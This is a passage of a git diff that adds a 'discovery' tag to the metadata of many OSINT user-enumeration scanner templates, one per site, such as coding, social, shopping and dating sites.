osint,osint-coding,codeforces,discovery self-contained: true diff --git a/http/osint/user-enumeration/codementor.yaml b/http/osint/user-enumeration/codementor.yaml index d94dbf8f6e5..7957d9ecc8b 100644 --- a/http/osint/user-enumeration/codementor.yaml +++ b/http/osint/user-enumeration/codementor.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,codementor + tags: osint,osint-coding,codementor,discovery self-contained: true diff --git a/http/osint/user-enumeration/coderwall.yaml b/http/osint/user-enumeration/coderwall.yaml index 18de3289188..84b0840e66d 100644 --- a/http/osint/user-enumeration/coderwall.yaml +++ b/http/osint/user-enumeration/coderwall.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,coderwall + tags: osint,osint-coding,coderwall,discovery self-contained: true diff --git a/http/osint/user-enumeration/codewars.yaml b/http/osint/user-enumeration/codewars.yaml index 039730210d6..18e42a6ed9e 100644 --- a/http/osint/user-enumeration/codewars.yaml +++ b/http/osint/user-enumeration/codewars.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,codewars + tags: osint,osint-coding,codewars,discovery self-contained: true diff --git a/http/osint/user-enumeration/cohost.yaml b/http/osint/user-enumeration/cohost.yaml index a519f899870..9d3750d639e 100644 --- a/http/osint/user-enumeration/cohost.yaml +++ b/http/osint/user-enumeration/cohost.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,cohost + tags: osint,osint-social,cohost,discovery self-contained: true diff --git a/http/osint/user-enumeration/colourlovers.yaml b/http/osint/user-enumeration/colourlovers.yaml index 134e2562842..bdfd7be322c 100644 --- a/http/osint/user-enumeration/colourlovers.yaml +++ b/http/osint/user-enumeration/colourlovers.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,colourlovers + tags: osint,osint-hobby,colourlovers,discovery self-contained: true diff --git a/http/osint/user-enumeration/contactossex.yaml b/http/osint/user-enumeration/contactossex.yaml index d4b18be10c5..0bca5b65367 100644 --- a/http/osint/user-enumeration/contactossex.yaml +++ b/http/osint/user-enumeration/contactossex.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,contactossex + tags: osint,osint-porn,contactossex,discovery self-contained: true diff --git a/http/osint/user-enumeration/coroflot.yaml b/http/osint/user-enumeration/coroflot.yaml index a88c99f6414..e86445dc0e6 100644 --- a/http/osint/user-enumeration/coroflot.yaml +++ b/http/osint/user-enumeration/coroflot.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,coroflot + tags: osint,osint-art,coroflot,discovery self-contained: true diff --git a/http/osint/user-enumeration/couchsurfing.yaml b/http/osint/user-enumeration/couchsurfing.yaml index 4b46b4233dc..f7e9802c060 100644 --- a/http/osint/user-enumeration/couchsurfing.yaml +++ b/http/osint/user-enumeration/couchsurfing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,couchsurfing + tags: osint,osint-social,couchsurfing,discovery self-contained: true diff --git a/http/osint/user-enumeration/cowboys4angels.yaml b/http/osint/user-enumeration/cowboys4angels.yaml index 1fbf1e4dcee..a4b8c0c922c 100644 --- a/http/osint/user-enumeration/cowboys4angels.yaml +++ b/http/osint/user-enumeration/cowboys4angels.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,cowboys4angels + tags: osint,osint-porn,cowboys4angels,discovery self-contained: true diff --git a/http/osint/user-enumeration/cracked-io.yaml b/http/osint/user-enumeration/cracked-io.yaml index 6a21b572584..b84012ec736 100644 --- a/http/osint/user-enumeration/cracked-io.yaml +++ b/http/osint/user-enumeration/cracked-io.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,cracked-io + tags: osint,osint-social,cracked-io,discovery self-contained: true diff --git a/http/osint/user-enumeration/cracked.yaml b/http/osint/user-enumeration/cracked.yaml index 0e4bf83bdc2..7d1070a250c 100644 --- a/http/osint/user-enumeration/cracked.yaml +++ b/http/osint/user-enumeration/cracked.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,cracked + tags: osint,osint-social,cracked,discovery self-contained: true diff --git a/http/osint/user-enumeration/crevado.yaml b/http/osint/user-enumeration/crevado.yaml index 093852c74af..bd4346d34fb 100644 --- a/http/osint/user-enumeration/crevado.yaml +++ b/http/osint/user-enumeration/crevado.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,crevado + tags: osint,osint-images,crevado,discovery self-contained: true diff --git a/http/osint/user-enumeration/crowdin.yaml b/http/osint/user-enumeration/crowdin.yaml index 382d53caaf0..88bf3415022 100644 --- a/http/osint/user-enumeration/crowdin.yaml +++ b/http/osint/user-enumeration/crowdin.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,crowdin + tags: osint,osint-hobby,crowdin,discovery self-contained: true diff --git a/http/osint/user-enumeration/ctflearn.yaml b/http/osint/user-enumeration/ctflearn.yaml index b696f01660d..129f39a87d0 100644 --- a/http/osint/user-enumeration/ctflearn.yaml +++ b/http/osint/user-enumeration/ctflearn.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,ctflearn + tags: osint,osint-social,ctflearn,discovery self-contained: true diff --git a/http/osint/user-enumeration/cults3d.yaml b/http/osint/user-enumeration/cults3d.yaml index 4637b04e47f..22c61397ea8 100644 --- a/http/osint/user-enumeration/cults3d.yaml +++ b/http/osint/user-enumeration/cults3d.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,cults3d + tags: osint,osint-hobby,cults3d,discovery self-contained: true diff --git a/http/osint/user-enumeration/curiouscat.yaml b/http/osint/user-enumeration/curiouscat.yaml index 8a5092cadc0..6e69c01cf23 100644 --- a/http/osint/user-enumeration/curiouscat.yaml +++ b/http/osint/user-enumeration/curiouscat.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,curiouscat + tags: osint,osint-social,curiouscat,discovery self-contained: true diff --git a/http/osint/user-enumeration/cytoid.yaml b/http/osint/user-enumeration/cytoid.yaml index 34d8e872c1c..618b2525cd3 100644 --- a/http/osint/user-enumeration/cytoid.yaml +++ b/http/osint/user-enumeration/cytoid.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,cytoid + tags: osint,osint-gaming,cytoid,discovery self-contained: true diff --git a/http/osint/user-enumeration/dailymotion.yaml b/http/osint/user-enumeration/dailymotion.yaml index c2dda73cf3b..df1e068b008 100644 --- a/http/osint/user-enumeration/dailymotion.yaml +++ b/http/osint/user-enumeration/dailymotion.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-video,dailymotion + tags: osint,osint-video,dailymotion,discovery self-contained: true diff --git a/http/osint/user-enumeration/darudar.yaml b/http/osint/user-enumeration/darudar.yaml index 4377a545699..399c11fc5d2 100644 --- a/http/osint/user-enumeration/darudar.yaml +++ b/http/osint/user-enumeration/darudar.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,darudar + tags: osint,osint-misc,darudar,discovery self-contained: true diff --git a/http/osint/user-enumeration/dateinasia.yaml b/http/osint/user-enumeration/dateinasia.yaml index 1a63ab6d695..721b393e459 100644 --- a/http/osint/user-enumeration/dateinasia.yaml +++ b/http/osint/user-enumeration/dateinasia.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,dateinasia + tags: osint,osint-dating,dateinasia,discovery self-contained: true diff --git a/http/osint/user-enumeration/datezone.yaml b/http/osint/user-enumeration/datezone.yaml index c560f179e5f..aa38c189e68 100644 --- a/http/osint/user-enumeration/datezone.yaml +++ b/http/osint/user-enumeration/datezone.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,datezone + tags: osint,osint-porn,datezone,discovery self-contained: true diff --git a/http/osint/user-enumeration/datingru.yaml b/http/osint/user-enumeration/datingru.yaml index 43270eb43fa..ef494d743d4 100644 --- a/http/osint/user-enumeration/datingru.yaml +++ b/http/osint/user-enumeration/datingru.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,datingru + tags: osint,osint-dating,datingru,discovery self-contained: true diff --git a/http/osint/user-enumeration/demotywatory.yaml b/http/osint/user-enumeration/demotywatory.yaml index 771d913c753..e2626983481 100644 --- a/http/osint/user-enumeration/demotywatory.yaml +++ b/http/osint/user-enumeration/demotywatory.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,demotywatory + tags: osint,osint-images,demotywatory,discovery self-contained: true diff --git a/http/osint/user-enumeration/depop.yaml b/http/osint/user-enumeration/depop.yaml index 332e099c05b..2c47e764c93 100644 --- a/http/osint/user-enumeration/depop.yaml +++ b/http/osint/user-enumeration/depop.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,depop + tags: osint,osint-shopping,depop,discovery self-contained: true diff --git a/http/osint/user-enumeration/designspriation.yaml b/http/osint/user-enumeration/designspriation.yaml index 57b827ddb90..c156c64c95d 100644 --- a/http/osint/user-enumeration/designspriation.yaml +++ b/http/osint/user-enumeration/designspriation.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,designspriation + tags: osint,osint-art,designspriation,discovery self-contained: true diff --git a/http/osint/user-enumeration/destructoid.yaml b/http/osint/user-enumeration/destructoid.yaml index 0f76da25dfb..47bd074660c 100644 --- a/http/osint/user-enumeration/destructoid.yaml +++ b/http/osint/user-enumeration/destructoid.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,destructoid + tags: osint,osint-social,destructoid,discovery self-contained: true diff --git a/http/osint/user-enumeration/deviantart.yaml b/http/osint/user-enumeration/deviantart.yaml index cb2b3f270a0..1e1e8192a51 100644 --- a/http/osint/user-enumeration/deviantart.yaml +++ b/http/osint/user-enumeration/deviantart.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,deviantart + tags: osint,osint-images,deviantart,discovery self-contained: true diff --git a/http/osint/user-enumeration/devrant.yaml b/http/osint/user-enumeration/devrant.yaml index 572629a17bb..0bf5ae83053 100644 --- a/http/osint/user-enumeration/devrant.yaml +++ b/http/osint/user-enumeration/devrant.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,devrant + tags: osint,osint-coding,devrant,discovery self-contained: true diff --git a/http/osint/user-enumeration/devto.yaml b/http/osint/user-enumeration/devto.yaml index 6480b7ca317..63aeb23869e 100644 --- a/http/osint/user-enumeration/devto.yaml +++ b/http/osint/user-enumeration/devto.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,devto + tags: osint,osint-coding,devto,discovery self-contained: true diff --git a/http/osint/user-enumeration/dfgames.yaml b/http/osint/user-enumeration/dfgames.yaml index 87339c80e0e..da750bbb7d1 100644 --- a/http/osint/user-enumeration/dfgames.yaml +++ b/http/osint/user-enumeration/dfgames.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,dfgames + tags: osint,osint-gaming,dfgames,discovery self-contained: true diff --git a/http/osint/user-enumeration/diablo.yaml b/http/osint/user-enumeration/diablo.yaml index 877091b93ab..b82bd7382c0 100644 --- a/http/osint/user-enumeration/diablo.yaml +++ b/http/osint/user-enumeration/diablo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,diablo + tags: osint,osint-gaming,diablo,discovery self-contained: true diff --git a/http/osint/user-enumeration/dibiz.yaml b/http/osint/user-enumeration/dibiz.yaml index 28538291287..dc5f564c5cc 100644 --- a/http/osint/user-enumeration/dibiz.yaml +++ b/http/osint/user-enumeration/dibiz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,dibiz + tags: osint,osint-business,dibiz,discovery self-contained: true diff --git a/http/osint/user-enumeration/digitalspy.yaml b/http/osint/user-enumeration/digitalspy.yaml index 994b1778d74..ff3ca202a9f 100644 --- a/http/osint/user-enumeration/digitalspy.yaml +++ b/http/osint/user-enumeration/digitalspy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,digitalspy + tags: osint,osint-social,digitalspy,discovery self-contained: true diff --git a/http/osint/user-enumeration/diigo.yaml b/http/osint/user-enumeration/diigo.yaml index 41618a33771..d44a552e61e 100644 --- a/http/osint/user-enumeration/diigo.yaml +++ b/http/osint/user-enumeration/diigo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,diigo + tags: osint,osint-images,diigo,discovery self-contained: true diff --git a/http/osint/user-enumeration/disabledrocks-mastodon-instance.yaml b/http/osint/user-enumeration/disabledrocks-mastodon-instance.yaml index cde65de9253..073bd7f71f3 100644 --- a/http/osint/user-enumeration/disabledrocks-mastodon-instance.yaml +++ b/http/osint/user-enumeration/disabledrocks-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,disabledrocks-mastodon-instance + tags: osint,osint-social,disabledrocks-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/discogs.yaml b/http/osint/user-enumeration/discogs.yaml index 76494ec44e4..0df6d83cab6 100644 --- a/http/osint/user-enumeration/discogs.yaml +++ b/http/osint/user-enumeration/discogs.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-music,discogs + tags: osint,osint-music,discogs,discovery self-contained: true diff --git a/http/osint/user-enumeration/discourse.yaml b/http/osint/user-enumeration/discourse.yaml index bcad6304ad4..c6f2bf67225 100644 --- a/http/osint/user-enumeration/discourse.yaml +++ b/http/osint/user-enumeration/discourse.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-misc,discourse + tags: osint,osint-misc,discourse,discovery self-contained: true diff --git a/http/osint/user-enumeration/discusselasticco.yaml b/http/osint/user-enumeration/discusselasticco.yaml index 1ee0f952caa..f7d79e139d4 100644 --- a/http/osint/user-enumeration/discusselasticco.yaml +++ b/http/osint/user-enumeration/discusselasticco.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,discusselasticco + tags: osint,osint-tech,discusselasticco,discovery self-contained: true diff --git a/http/osint/user-enumeration/discusssocial-mastodon-instance.yaml b/http/osint/user-enumeration/discusssocial-mastodon-instance.yaml index 239d8ecf28a..58eb4e1532b 100644 --- a/http/osint/user-enumeration/discusssocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/discusssocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,discusssocial-mastodon-instance + tags: osint,osint-social,discusssocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/disqus.yaml b/http/osint/user-enumeration/disqus.yaml index 133ef813a04..18b104b105c 100644 --- a/http/osint/user-enumeration/disqus.yaml +++ b/http/osint/user-enumeration/disqus.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,disqus + tags: osint,osint-social,disqus,discovery self-contained: true diff --git a/http/osint/user-enumeration/dissenter.yaml b/http/osint/user-enumeration/dissenter.yaml index 15e9f26e9fd..3d4fc8d50c0 100644 --- a/http/osint/user-enumeration/dissenter.yaml +++ b/http/osint/user-enumeration/dissenter.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-political,dissenter + tags: osint,osint-political,dissenter,discovery self-contained: true diff --git a/http/osint/user-enumeration/dockerhub.yaml b/http/osint/user-enumeration/dockerhub.yaml index 855f13df652..9572fd2144a 100644 --- a/http/osint/user-enumeration/dockerhub.yaml +++ b/http/osint/user-enumeration/dockerhub.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-coding,dockerhub + tags: osint,osint-coding,dockerhub,discovery self-contained: true diff --git a/http/osint/user-enumeration/dojoverse.yaml b/http/osint/user-enumeration/dojoverse.yaml index 9b369e5b2a1..eacfaa9679c 100644 --- a/http/osint/user-enumeration/dojoverse.yaml +++ b/http/osint/user-enumeration/dojoverse.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,dojoverse + tags: osint,osint-hobby,dojoverse,discovery self-contained: true diff --git a/http/osint/user-enumeration/donation-alerts.yaml b/http/osint/user-enumeration/donation-alerts.yaml index a1fa72d5c94..f933c61b954 100644 --- a/http/osint/user-enumeration/donation-alerts.yaml +++ b/http/osint/user-enumeration/donation-alerts.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,donation-alerts + tags: osint,osint-business,donation-alerts,discovery self-contained: true diff --git a/http/osint/user-enumeration/dotcards.yaml b/http/osint/user-enumeration/dotcards.yaml index c249faa0959..bc49ff3d24c 100644 --- a/http/osint/user-enumeration/dotcards.yaml +++ b/http/osint/user-enumeration/dotcards.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-business,dotcards + tags: osint,osint-business,dotcards,discovery self-contained: true diff --git a/http/osint/user-enumeration/dribbble.yaml b/http/osint/user-enumeration/dribbble.yaml index 502619a608a..ba66bba6b23 100644 --- a/http/osint/user-enumeration/dribbble.yaml +++ b/http/osint/user-enumeration/dribbble.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,dribbble + tags: osint,osint-art,dribbble,discovery self-contained: true diff --git a/http/osint/user-enumeration/droners.yaml b/http/osint/user-enumeration/droners.yaml index 878659bc47a..b80cdb1e44e 100644 --- a/http/osint/user-enumeration/droners.yaml +++ b/http/osint/user-enumeration/droners.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,droners + tags: osint,osint-hobby,droners,discovery self-contained: true diff --git a/http/osint/user-enumeration/drum.yaml b/http/osint/user-enumeration/drum.yaml index 5fd1d10b40e..7d27f713803 100644 --- a/http/osint/user-enumeration/drum.yaml +++ b/http/osint/user-enumeration/drum.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,drum + tags: osint,osint-hobby,drum,discovery self-contained: true diff --git a/http/osint/user-enumeration/duolingo.yaml b/http/osint/user-enumeration/duolingo.yaml index b46125f6463..3b152d215e2 100644 --- a/http/osint/user-enumeration/duolingo.yaml +++ b/http/osint/user-enumeration/duolingo.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,duolingo + tags: osint,osint-hobby,duolingo,discovery self-contained: true diff --git a/http/osint/user-enumeration/easyen.yaml b/http/osint/user-enumeration/easyen.yaml index d19791daf15..459ba472385 100644 --- a/http/osint/user-enumeration/easyen.yaml +++ b/http/osint/user-enumeration/easyen.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,easyen + tags: osint,osint-social,easyen,discovery self-contained: true diff --git a/http/osint/user-enumeration/ebay-stores.yaml b/http/osint/user-enumeration/ebay-stores.yaml index 3e8f707187d..326404f1ff0 100644 --- a/http/osint/user-enumeration/ebay-stores.yaml +++ b/http/osint/user-enumeration/ebay-stores.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,ebay-stores + tags: osint,osint-shopping,ebay-stores,discovery self-contained: true diff --git a/http/osint/user-enumeration/ebay.yaml b/http/osint/user-enumeration/ebay.yaml index 7bcb2185df3..8d0f8ba98fb 100644 --- a/http/osint/user-enumeration/ebay.yaml +++ b/http/osint/user-enumeration/ebay.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,ebay + tags: osint,osint-shopping,ebay,discovery self-contained: true diff --git a/http/osint/user-enumeration/elloco.yaml b/http/osint/user-enumeration/elloco.yaml index 57eb057c242..ac8c305760c 100644 --- a/http/osint/user-enumeration/elloco.yaml +++ b/http/osint/user-enumeration/elloco.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,elloco + tags: osint,osint-art,elloco,discovery self-contained: true diff --git a/http/osint/user-enumeration/engadget.yaml b/http/osint/user-enumeration/engadget.yaml index 5f49364ff7e..fcc58466591 100644 --- a/http/osint/user-enumeration/engadget.yaml +++ b/http/osint/user-enumeration/engadget.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-tech,engadget + tags: osint,osint-tech,engadget,discovery self-contained: true diff --git a/http/osint/user-enumeration/eporner.yaml b/http/osint/user-enumeration/eporner.yaml index 62e42deac14..971b536b581 100644 --- a/http/osint/user-enumeration/eporner.yaml +++ b/http/osint/user-enumeration/eporner.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,eporner + tags: osint,osint-porn,eporner,discovery self-contained: true diff --git a/http/osint/user-enumeration/etoro.yaml b/http/osint/user-enumeration/etoro.yaml index 5510fc74f1a..23945bc23f1 100644 --- a/http/osint/user-enumeration/etoro.yaml +++ b/http/osint/user-enumeration/etoro.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-finance,etoro + tags: osint,osint-finance,etoro,discovery self-contained: true diff --git a/http/osint/user-enumeration/etsy.yaml b/http/osint/user-enumeration/etsy.yaml index 9b73fb45b7e..28f1309ee0f 100644 --- a/http/osint/user-enumeration/etsy.yaml +++ b/http/osint/user-enumeration/etsy.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-shopping,etsy + tags: osint,osint-shopping,etsy,discovery self-contained: true diff --git a/http/osint/user-enumeration/expressionalsocial-mastodon-instance.yaml b/http/osint/user-enumeration/expressionalsocial-mastodon-instance.yaml index 94a81335d5a..5de336d8512 100644 --- a/http/osint/user-enumeration/expressionalsocial-mastodon-instance.yaml +++ b/http/osint/user-enumeration/expressionalsocial-mastodon-instance.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,expressionalsocial-mastodon-instance + tags: osint,osint-social,expressionalsocial-mastodon-instance,discovery self-contained: true diff --git a/http/osint/user-enumeration/extralunchmoney.yaml b/http/osint/user-enumeration/extralunchmoney.yaml index c1264388f7d..9b4a09246b8 100644 --- a/http/osint/user-enumeration/extralunchmoney.yaml +++ b/http/osint/user-enumeration/extralunchmoney.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,extralunchmoney + tags: osint,osint-porn,extralunchmoney,discovery self-contained: true diff --git a/http/osint/user-enumeration/eyeem.yaml b/http/osint/user-enumeration/eyeem.yaml index f28443372b1..88aad6d0a1a 100644 --- a/http/osint/user-enumeration/eyeem.yaml +++ b/http/osint/user-enumeration/eyeem.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-art,eyeem + tags: osint,osint-art,eyeem,discovery self-contained: true diff --git a/http/osint/user-enumeration/f3.yaml b/http/osint/user-enumeration/f3.yaml index 2541cd5a5fd..f430bcea162 100644 --- a/http/osint/user-enumeration/f3.yaml +++ b/http/osint/user-enumeration/f3.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,f3 + tags: osint,osint-social,f3,discovery self-contained: true diff --git a/http/osint/user-enumeration/fabswingers.yaml b/http/osint/user-enumeration/fabswingers.yaml index 6cfed3262f9..9efa42004aa 100644 --- a/http/osint/user-enumeration/fabswingers.yaml +++ b/http/osint/user-enumeration/fabswingers.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-dating,fabswingers + tags: osint,osint-dating,fabswingers,discovery self-contained: true diff --git a/http/osint/user-enumeration/facebook-page.yaml b/http/osint/user-enumeration/facebook-page.yaml index ed717313759..97eb02a45f2 100644 --- a/http/osint/user-enumeration/facebook-page.yaml +++ b/http/osint/user-enumeration/facebook-page.yaml @@ -13,7 +13,7 @@ info: metadata: verified: "true" max-request: 1 - tags: osint,osint-business,osint-social + tags: osint,osint-business,osint-social,discovery self-contained: true diff --git a/http/osint/user-enumeration/faktopedia.yaml b/http/osint/user-enumeration/faktopedia.yaml index 60f8729e4a1..25a679a6c5f 100644 --- a/http/osint/user-enumeration/faktopedia.yaml +++ b/http/osint/user-enumeration/faktopedia.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-images,faktopedia + tags: osint,osint-images,faktopedia,discovery self-contained: true diff --git a/http/osint/user-enumeration/fancentro.yaml b/http/osint/user-enumeration/fancentro.yaml index 2accba98dd2..8a146062572 100644 --- a/http/osint/user-enumeration/fancentro.yaml +++ b/http/osint/user-enumeration/fancentro.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,fancentro + tags: osint,osint-porn,fancentro,discovery self-contained: true diff --git a/http/osint/user-enumeration/fandalism.yaml b/http/osint/user-enumeration/fandalism.yaml index 310d9585115..e13135c33a3 100644 --- a/http/osint/user-enumeration/fandalism.yaml +++ b/http/osint/user-enumeration/fandalism.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,fandalism + tags: osint,osint-hobby,fandalism,discovery self-contained: true diff --git a/http/osint/user-enumeration/fandom.yaml b/http/osint/user-enumeration/fandom.yaml index 9fb959e84a2..e14a4b96d13 100644 --- a/http/osint/user-enumeration/fandom.yaml +++ b/http/osint/user-enumeration/fandom.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-gaming,fandom + tags: osint,osint-gaming,fandom,discovery self-contained: true diff --git a/http/osint/user-enumeration/fanpop.yaml b/http/osint/user-enumeration/fanpop.yaml index a354b121fbf..12579571e52 100644 --- a/http/osint/user-enumeration/fanpop.yaml +++ b/http/osint/user-enumeration/fanpop.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,fanpop + tags: osint,osint-social,fanpop,discovery self-contained: true diff --git a/http/osint/user-enumeration/fansly.yaml b/http/osint/user-enumeration/fansly.yaml index a5344822941..91fd7386222 100644 --- a/http/osint/user-enumeration/fansly.yaml +++ b/http/osint/user-enumeration/fansly.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-porn,fansly + tags: osint,osint-porn,fansly,discovery self-contained: true diff --git a/http/osint/user-enumeration/fark.yaml b/http/osint/user-enumeration/fark.yaml index 584e571f72c..5d1b16b8b5d 100644 --- a/http/osint/user-enumeration/fark.yaml +++ b/http/osint/user-enumeration/fark.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-social,fark + tags: osint,osint-social,fark,discovery self-contained: true diff --git a/http/osint/user-enumeration/farkascity.yaml b/http/osint/user-enumeration/farkascity.yaml index 14a8082f32e..e31036f43de 100644 --- a/http/osint/user-enumeration/farkascity.yaml +++ b/http/osint/user-enumeration/farkascity.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-blog,farkascity + tags: osint,osint-blog,farkascity,discovery self-contained: true diff --git a/http/osint/user-enumeration/fatsecret.yaml b/http/osint/user-enumeration/fatsecret.yaml index 21a4af2274b..c614a2a048a 100644 --- a/http/osint/user-enumeration/fatsecret.yaml +++ b/http/osint/user-enumeration/fatsecret.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-health,fatsecret + tags: osint,osint-health,fatsecret,discovery self-contained: true diff --git a/http/osint/user-enumeration/fcv.yaml b/http/osint/user-enumeration/fcv.yaml index b2b0aba67ca..25bbc720ffa 100644 --- a/http/osint/user-enumeration/fcv.yaml +++ b/http/osint/user-enumeration/fcv.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: osint,osint-hobby,fcv + tags: osint,osint-hobby,fcv,discovery self-contained: true diff --git a/http/osint/user-enumeration/federatedpress-mastodon-instance.yaml b/http/osint/user-enumeration/federatedpress-mastodon-instance.yaml 